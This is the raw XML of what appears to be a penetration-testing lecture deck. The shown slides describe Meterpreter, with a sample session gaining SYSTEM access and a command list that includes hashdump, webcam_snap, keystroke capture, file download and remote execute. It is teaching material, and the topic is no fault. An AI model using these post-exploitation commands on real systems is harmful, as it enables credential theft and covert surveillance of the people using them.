              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1341438"/>
            <a:ext cx="9144000" cy="4789487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once installed, allow the attacker to interact with and execute commands on the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Runs with the privileges associated with program that was exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example: exploit IRC client installing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, it has the privileges and rights of “root” account if IRC is running as the root account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NOTE: Run programs with the most restrictive privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1743618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Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ( or shell)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( or shell) starts a new process, which can be detected by keen user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( or shell) has limited commands, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can access and control most popular tools and functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4101463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0163"/>
            <a:ext cx="8229600" cy="1139825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1196975"/>
            <a:ext cx="7772400" cy="5449888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>System Language : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>en_US</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>OS              : Windows XP (Build 2600, Service Pack 2).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Computer        : AGABRIEL-B90B23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Architecture    : x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>     : x86/win32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Server username: NT AUTHORITY\SYSTEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &gt; shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Process 396 created.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Channel 1 created.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Microsoft Windows XP [Version 5.1.2600]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>(C) Copyright 1985-2001 Microsoft Corp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>C:\WINDOWS\system32&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172202356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0163"/>
            <a:ext cx="8229600" cy="1139825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1196975"/>
            <a:ext cx="7772400" cy="5449888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>igrate: move the server to another process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> in case the vulnerable service you attack is shut down or stopped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at: display local file contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ownload: pull a file or directory from the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pload: move file to the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dit: make changes to simple files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xecute: issue command and have it run on the remote machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230551910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0163"/>
            <a:ext cx="8229600" cy="1139825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="908050"/>
            <a:ext cx="7772400" cy="5738813"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kill: stop a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hutdown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Webcam_snap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>keybscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>_{start, stop, dump}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417995380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Screen shot 2015-02-25 at 10.04.5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882015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7346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descr="Screen shot 2015-02-25 at 10.34.4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0"/>
            <a:ext cx="8628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19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Useful links</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Course</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.offensive-security.com/metasploit-unleashed/Main_Page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> homepage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.metasploit.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> homepage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.fastandeasyhacking.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1711899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13532</TotalTime>
  <Words>4515</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>523</Paragraphs>
  <Slides>97</Slides>
  <Notes>37</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Executive</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What Does a Malicious Hacker Do</vt:lpstr>
      <vt:lpstr>Perspective of Adversary</vt:lpstr>
      <vt:lpstr>Security Testing Techniques </vt:lpstr>
      <vt:lpstr>What is Penetration Testing?</vt:lpstr>
      <vt:lpstr>Why Penetration Testing?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Target information</vt:lpstr>
      <vt:lpstr>Target information (cont.)</vt:lpstr>
      <vt:lpstr>Reconnaissance Tools</vt:lpstr>
      <vt:lpstr>The Harvester</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Host</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>WHOIS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Netcraft</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NSLOOKUP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Dig</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Fierce</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MetaGooFil</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Scanning Tools</vt:lpstr>
      <vt:lpstr>Ping</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Ping Sweep</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Ping Sweep (cont.)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NMap</vt:lpstr>
      <vt:lpstr>Nmap (cont.)</vt:lpstr>
      <vt:lpstr>Nmap (cont.)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nmap – TCP Connection Scan</vt:lpstr>
      <vt:lpstr>A closed port</vt:lpstr>
      <vt:lpstr>A open port</vt:lpstr>
      <vt:lpstr>Nmap – TCP Connection Scan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nmap – SYN Scan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nmap – FIN Scan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nmap – Xmas Scan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>FIN, Xmas Tree, and Null Scan</vt:lpstr>
      <vt:lpstr>FIN, Xmas Tree, and Null Scan</vt:lpstr>
      <vt:lpstr>Nmap – ACK Scan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nmap – Window Scan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NESSUS – Vulnerability Scan</vt:lpstr>
      <vt:lpstr>Metaploit -- overview</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploitation Tools</vt:lpstr>
      <vt:lpstr>Metasploit Terms</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>Module </vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Payload</vt:lpstr>
      <vt:lpstr>Msfconsole</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PT process</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Metasploit Framework: Running Metasploit</vt:lpstr>
      <vt:lpstr>The Metasploit Framework: Demo Walkthrough</vt:lpstr>
      <vt:lpstr>The Metasploit Framework: More about the Exploit</vt:lpstr>
      <vt:lpstr>The Metasploit Framework: Project</vt:lpstr>
      <vt:lpstr>Payload Types</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sample Payloads</vt:lpstr>
      <vt:lpstr>Blind Payloads vs Reverse Payloads</vt:lpstr>
      <vt:lpstr>Meterpreter</vt:lpstr>
      <vt:lpstr>Meterpreter</vt:lpstr>
      <vt:lpstr>Meterpreter vs cmd ( or shell)</vt:lpstr>
      <vt:lpstr>Meterpreter Commands</vt:lpstr>
      <vt:lpstr>Meterpreter Commands</vt:lpstr>
      <vt:lpstr>Meterpreter Commands</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
